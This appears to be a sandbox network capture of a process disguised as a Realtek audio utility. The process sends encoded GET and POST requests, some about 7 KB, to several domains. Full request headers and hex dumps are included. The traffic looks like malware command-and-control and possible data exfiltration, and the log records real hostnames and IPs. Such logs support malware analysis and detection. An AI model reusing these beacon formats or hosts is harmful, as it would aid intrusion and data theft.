Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:03.119227886 CET	540	OUT	GET /kj1o/?NvA=qUwPQPTQmTwyizTU&cOnShP=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs= HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:32:03.248102903 CET	785	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 09 Jan 2025 07:32:03 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Thu, 09 Jan 2025 08:32:03 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1jaig3pdLBi%2BJYz8YlmucACMPjFYxI8UPfPRSmO80NOTkZRPwO1kckLOtWzyDQ3RYbycMjMmYS%2F6ZP4Y1uGWGKmEy0%2BauoNZFQz%2B8X7um9b6FU5g%2BRw2IRyMlRfpAWTR0iT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bb2fed49225b-ORD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.20	49742	136.243.64.147	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:18.873261929 CET	826	OUT	POST /cxj4/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/cxj4/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6d 48 49 50 47 61 64 4b 6c 5a 43 61 64 66 66 59 33 65 6a 5a 41 2b 67 77 48 76 76 4f 6d 49 45 75 54 35 4e 41 46 59 54 31 66 65 39 32 4c 6f 79 2f 51 58 65 70 6f 7a 51 73 72 4f 33 42 7a 77 70 73 79 62 45 31 7a 76 2f 76 71 67 55 2b 44 7a 56 38 49 37 45 76 35 45 50 4c 4c 4d 76 47 54 51 46 31 6c 61 61 43 34 44 76 50 35 45 62 4d 4c 6b 79 51 6d 43 58 4d 6b 63 52 33 2f 31 38 55 73 2f 2b 48 54 39 64 66 45 55 50 71 43 32 6f 53 72 4a 73 2b 47 31 6c 41 54 6f 51 48 68 49 55 34 59 78 32 38 76 4e 69 4a 75 35 31 78 41 63 70 30 4c 6f 4b 70 67 36 79 6d 6b 41 3d 3d Data Ascii: cOnShP=tIFi+WNsJjQFmHIPGadKlZCadffY3ejZA+gwHvvOmIEuT5NAFYT1fe92Loy/QXepozQsrO3BzwpsybE1zv/vqgU+DzV8I7Ev5EPLLMvGTQF1laaC4DvP5EbMLkyQmCXMkcR3/18Us/+HT9dfEUPqC2oSrJs+G1lAToQHhIU4Yx28vNiJu51xAcp0LoKpg6ymkA==
Jan 9, 2025 08:32:19.097394943 CET	493	IN	HTTP/1.1 302 Found Date: Thu, 09 Jan 2025 07:32:18 GMT Server: Apache Location: http://maximumgroup.co.za/cxj4/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.11.20	49743	136.243.64.147	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:21.629374027 CET	846	OUT	POST /cxj4/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/cxj4/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6b 6e 34 50 46 39 42 4b 6b 35 43 64 42 76 66 59 35 2b 6a 64 41 2b 38 77 48 75 71 4c 6c 2b 55 75 57 72 56 41 47 64 2f 31 65 65 39 32 45 49 79 36 55 58 65 79 6f 7a 63 53 72 50 4c 42 7a 78 4e 73 79 65 34 31 7a 59 54 6f 71 77 55 38 43 44 56 36 48 62 45 76 35 45 50 4c 4c 49 4f 68 54 51 74 31 6c 75 6d 43 70 52 58 51 36 45 62 44 63 55 79 51 78 53 57 4c 6b 63 52 46 2f 33 45 36 73 39 32 48 54 2b 4a 66 45 46 50 70 56 47 6f 49 6b 70 74 48 41 6c 6b 4f 63 4a 5a 77 77 34 30 6c 66 53 50 49 6e 37 76 54 7a 4c 42 56 44 50 31 47 50 59 7a 42 69 34 7a 39 35 48 79 72 66 69 50 75 7a 30 56 51 51 52 74 78 44 71 47 4e 73 41 6f 3d Data Ascii: cOnShP=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+UuWrVAGd/1ee92EIy6UXeyozcSrPLBzxNsye41zYToqwU8CDV6HbEv5EPLLIOhTQt1lumCpRXQ6EbDcUyQxSWLkcRF/3E6s92HT+JfEFPpVGoIkptHAlkOcJZww40lfSPIn7vTzLBVDP1GPYzBi4z95HyrfiPuz0VQQRtxDqGNsAo=
Jan 9, 2025 08:32:21.854053020 CET	493	IN	HTTP/1.1 302 Found Date: Thu, 09 Jan 2025 07:32:21 GMT Server: Apache Location: http://maximumgroup.co.za/cxj4/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.11.20	49744	136.243.64.147	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:24.382992983 CET	1289	OUT	POST /cxj4/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/cxj4/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6b 6e 34 50 46 39 42 4b 6b 35 43 64 42 76 66 59 35 2b 6a 64 41 2b 38 77 48 75 71 4c 6c 2b 63 75 57 2b 4a 41 47 36 4c 31 64 65 39 32 4e 6f 79 37 55 58 65 2f 6f 7a 46 56 72 50 47 6a 7a 79 6c 73 7a 34 73 31 36 4d 48 6f 68 77 55 38 48 7a 56 37 49 37 45 32 35 46 2f 50 4c 4d 69 68 54 51 74 31 6c 76 32 43 35 7a 76 51 38 45 62 4d 4c 6b 79 63 6d 43 57 76 6b 63 49 79 2f 78 59 45 74 4d 57 48 54 59 70 66 49 54 54 70 4a 57 6f 57 6a 70 74 32 41 6c 6f 46 63 4a 55 4a 77 34 41 44 66 52 66 49 6b 64 33 46 30 2f 45 4c 41 4e 46 2b 51 59 37 31 6b 37 6a 31 7a 41 7a 58 65 52 62 52 30 68 4e 54 58 6a 31 52 55 71 65 55 2f 56 46 39 72 38 4f 54 58 63 63 35 42 33 64 4d 6f 73 6c 6b 67 51 4f 75 78 4b 5a 4f 70 51 68 57 48 51 33 61 48 64 35 44 77 32 70 48 5a 42 46 53 6a 6e 7a 71 76 35 53 37 30 30 63 58 6e 66 6a 7a 4c 5a 51 53 30 49 65 55 65 68 63 70 64 67 79 56 67 51 4c 4e 73 39 5a 58 51 77 76 30 71 73 50 43 50 4b 34 47 41 55 4b 76 33 31 51 44 6a 57 4d 2f 6c 6b 36 4e 63 49 37 [TRUNCATED] Data Ascii: cOnShP=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+cuW+JAG6L1de92Noy7UXe/ozFVrPGjzylsz4s16MHohwU8HzV7I7E25F/PLMihTQt1lv2C5zvQ8EbMLkycmCWvkcIy/xYEtMWHTYpfITTpJWoWjpt2AloFcJUJw4ADfRfIkd3F0/ELANF+QY71k7j1zAzXeRbR0hNTXj1RUqeU/VF9r8OTXcc5B3dMoslkgQOuxKZOpQhWHQ3aHd5Dw2pHZBFSjnzqv5S700cXnfjzLZQS0IeUehcpdgyVgQLNs9ZXQwv0qsPCPK4GAUKv31QDjWM/lk6NcI7/RevUiBWtczGaPEvbPbSX2eQc46ABGMAWJgkgtSW7KEPXRTHm+NAKkbBCdnMKEiyRsf+wDeO7yh7HuhRJHFLkNdA4hkiD7ZX4kniJObGWp+m+cVe77KYRfifgirUfBcbDBfidJjQ5oUr0Y8ekzO0ZqEs1UqJEIbzZJaW6hK0iyijbol/JUZxpAcX8uskpsxfVfqmX76iUIj/xW0ESldgPaxSP9v4IJgnWgG7J31qI0WAqChAy+1XkKXesuMT1s57IlJnDQgJcw++hhOr73QFj341Zm/OAR77v3gAbLDuStad+5g6aaX5R80QZji5NFAUplbv/V+
Jan 9, 2025 08:32:24.383043051 CET	1289	OUT	Data Raw: 73 6f 4a 65 75 63 4d 48 37 32 2f 32 34 47 35 43 35 43 41 55 58 75 6a 65 70 57 7a 59 55 6f 50 42 33 74 4e 42 76 53 72 76 6d 77 74 57 6e 74 39 77 37 55 4a 72 2f 4d 71 5a 77 65 54 50 63 71 35 56 4a 51 4a 42 36 69 6b 30 63 79 66 6a 7a 6d 74 67 31 2f Data Ascii: soJeucMH72/24G5C5CAUXujepWzYUoPB3tNBvSrvmwtWnt9w7UJr/MqZweTPcq5VJQJB6ik0cyfjzmtg1/ZxUqPXy/hBnbjvJCCRIRONIENEsU9IjO0gOLfO5gNKRSI5L/OgRuRulg6/kPx7u08P9sHI9AE34sxNo/vTdbpcyYNK9z7jeddWJkS1+EEwbR4UuuoiMqNJ1MPTp4sqh0VJN7sEStmTQIJy7R31P1cEK5wu2zNj6gL
Jan 9, 2025 08:32:24.383105040 CET	5417	OUT	Data Raw: 31 53 31 34 31 58 42 59 50 75 45 2f 66 44 6f 6e 4a 42 54 61 52 59 46 30 2b 6a 53 77 7a 48 64 6a 39 72 68 6b 4c 4c 70 31 64 44 7a 47 79 75 54 44 67 42 6f 6b 49 48 5a 50 45 43 69 77 30 74 6c 4e 6a 43 39 45 6a 61 38 67 38 66 49 79 54 39 41 4b 76 46 Data Ascii: 1S141XBYPuE/fDonJBTaRYF0+jSwzHdj9rhkLLp1dDzGyuTDgBokIHZPECiw0tlNjC9Eja8g8fIyT9AKvFGWCacNWBzXqNchRYYYsiKS6m3nUSXbzkDTSXvAdb7wyqwIwnfUEbwqOUHjtu+mWEuJpvF2LumPOwEhQwvL2q8aQbGlSlHLu4EAFgIba/6jRw/PPKn6GJn0zRIQnq0IEjlRxhexKOiyodDogzplmsg6DjC7SoedaNo
Jan 9, 2025 08:32:24.612612009 CET	493	IN	HTTP/1.1 302 Found Date: Thu, 09 Jan 2025 07:32:24 GMT Server: Apache Location: http://maximumgroup.co.za/cxj4/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.20	49745	136.243.64.147	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:27.142232895 CET	549	OUT	GET /cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA= HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:32:27.369851112 CET	795	IN	HTTP/1.1 302 Found Date: Thu, 09 Jan 2025 07:32:27 GMT Server: Apache Location: http://maximumgroup.co.za/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA= Content-Length: 443 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 3f 4e 76 41 3d 71 55 77 50 51 50 54 51 6d 54 77 79 69 7a 54 55 26 61 6d 70 3b 63 4f 6e 53 68 50 3d 67 4b 74 43 39 6d 70 4e 48 54 6b 54 72 30 30 4f 4f 72 6c 75 6c 38 43 31 51 2b 44 58 76 4e 75 6f 4d 38 45 62 58 4d 4b 4e 6a 65 59 6d 45 5a 74 63 47 61 6a 79 42 63 74 72 57 4f 36 6f 45 48 4f 6f 6f 67 46 54 6c 66 53 38 2b 44 4e 51 77 35 35 44 32 4d 66 43 71 41 68 6a 49 6a 4e 67 5a 36 6b 77 6b 48 4c 71 49 4c 79 46 56 51 6b 6b 33 66 65 34 75 43 33 45 37 44 41 3d 22 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/?NvA=qUwPQPTQmTwyizTU&cOnShP=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.20	49746	202.95.11.110	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:33.028630018 CET	805	OUT	POST /wbfy/ HTTP/1.1 Host: www.mirenzhibo.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.mirenzhibo.net Referer: http://www.mirenzhibo.net/wbfy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 79 65 34 55 33 64 79 49 63 37 79 66 2f 77 66 34 2b 4f 76 31 6a 70 79 45 70 46 4d 6b 54 38 42 6b 66 55 72 52 4c 32 53 58 51 6f 74 78 56 30 4d 49 2b 4e 79 66 4e 53 68 73 32 49 4a 35 55 62 62 4a 54 2f 2b 63 64 70 77 76 6c 31 42 4e 65 7a 58 58 55 5a 6e 38 49 38 59 49 4e 42 53 78 46 67 66 50 39 38 48 4e 4a 79 75 30 30 6e 34 58 78 45 30 63 6e 55 4e 7a 31 6d 35 65 46 4f 63 65 76 6f 68 2b 71 38 59 42 48 31 6e 54 39 74 61 58 35 6f 56 49 70 75 37 59 51 44 4c 34 6c 34 38 4f 55 46 4f 43 5a 55 61 6e 33 58 36 67 4f 77 64 39 6a 61 32 6c 50 56 49 7a 46 67 3d 3d Data Ascii: cOnShP=ac270/Kc6bxJye4U3dyIc7yf/wf4+Ov1jpyEpFMkT8BkfUrRL2SXQotxV0MI+NyfNShs2IJ5UbbJT/+cdpwvl1BNezXXUZn8I8YINBSxFgfP98HNJyu00n4XxE0cnUNz1m5eFOcevoh+q8YBH1nT9taX5oVIpu7YQDL4l48OUFOCZUan3X6gOwd9ja2lPVIzFg==
Jan 9, 2025 08:32:33.368633032 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Thu, 09 Jan 2025 07:32:33 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.20	49747	202.95.11.110	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:35.857700109 CET	825	OUT	POST /wbfy/ HTTP/1.1 Host: www.mirenzhibo.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.mirenzhibo.net Referer: http://www.mirenzhibo.net/wbfy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 70 6b 66 32 7a 52 4b 7a 79 58 54 6f 74 78 4e 45 4d 4e 39 39 79 45 4e 53 6c 6b 32 4a 31 35 55 62 50 4a 54 36 43 63 63 61 59 6f 6b 6c 42 54 66 44 58 56 61 35 6e 38 49 38 59 49 4e 42 58 71 46 67 48 50 39 4d 58 4e 49 51 47 31 72 58 34 59 32 45 30 63 78 6b 4d 36 31 6d 35 73 46 4d 70 4c 76 72 56 2b 71 38 49 42 47 67 62 53 7a 74 61 52 32 49 55 70 68 4e 69 4e 49 78 2f 4e 73 4b 6b 6c 62 6e 44 32 52 69 58 39 71 6c 4f 45 4e 6a 42 50 6e 71 50 4e 4e 58 4a 6f 59 6e 32 61 55 4d 6c 39 4e 53 4b 31 32 65 74 62 2f 39 51 49 4a 4d 41 3d Data Ascii: cOnShP=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKpkf2zRKzyXTotxNEMN99yENSlk2J15UbPJT6CccaYoklBTfDXVa5n8I8YINBXqFgHP9MXNIQG1rX4Y2E0cxkM61m5sFMpLvrV+q8IBGgbSztaR2IUphNiNIx/NsKklbnD2RiX9qlOENjBPnqPNNXJoYn2aUMl9NSK12etb/9QIJMA=
Jan 9, 2025 08:32:36.202699900 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Thu, 09 Jan 2025 07:32:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.20	49748	202.95.11.110	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:32:38.688401937 CET	1289	OUT	POST /wbfy/ HTTP/1.1 Host: www.mirenzhibo.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.mirenzhibo.net Referer: http://www.mirenzhibo.net/wbfy/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 52 6b 65 46 37 52 4b 53 79 58 53 6f 74 78 54 30 4d 4d 39 39 7a 65 4e 57 42 67 32 4a 34 4d 55 59 33 4a 63 38 32 63 56 4c 59 6f 39 56 42 54 61 7a 58 59 55 5a 6e 6c 49 38 49 4d 4e 42 6e 71 46 67 48 50 39 4b 72 4e 49 43 75 31 74 58 34 58 78 45 30 71 6e 55 4e 66 31 6c 4a 57 46 4d 73 77 75 59 4e 2b 71 63 34 42 46 53 7a 53 37 74 61 54 36 6f 55 4c 68 4e 66 64 49 78 7a 72 73 4c 51 44 62 67 66 32 53 45 4b 5a 2f 6d 4b 37 55 54 46 2f 34 75 79 32 45 55 4e 6d 57 46 69 4e 64 38 45 58 43 55 69 69 32 4e 64 4b 72 4e 51 73 66 38 6b 48 73 6e 6b 6d 52 38 6a 76 59 68 4f 58 30 55 31 54 78 68 64 4c 47 6a 33 66 4f 7a 4c 7a 38 77 39 36 34 45 6e 37 4e 48 30 45 37 6f 73 72 77 68 46 53 35 4e 63 66 64 45 47 75 42 48 63 6f 50 52 69 42 6d 52 52 4e 52 6d 77 6b 34 66 4d 64 